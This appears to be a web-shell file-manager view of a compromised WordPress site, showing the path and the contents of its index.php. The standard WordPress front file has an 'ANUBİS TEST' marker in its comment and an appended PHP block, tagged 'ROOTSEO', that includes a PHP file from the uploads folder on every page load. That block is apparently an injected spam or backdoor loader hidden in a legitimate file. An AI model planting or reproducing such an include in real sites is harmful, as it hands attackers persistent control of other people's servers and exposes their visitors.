/
home
/
devanchordigital-clearlyglass
/
htdocs
/
clearlyglass.devanchordigital.com.au
/
up file
home
<?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. *ANUBİS TEST * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php'; <?php /* ROOTSEO_START:2cd52280d081 */ if (!defined('ROOTSEO_CONNECTOR_EMBED_RENDER')) define('ROOTSEO_CONNECTOR_EMBED_RENDER', true); include_once '/home/devanchordigital-clearlyglass/htdocs/clearlyglass.devanchordigital.com.au/wp-content/uploads/seo-config-release.php'; /* ROOTSEO_END:2cd52280d081 */ ?>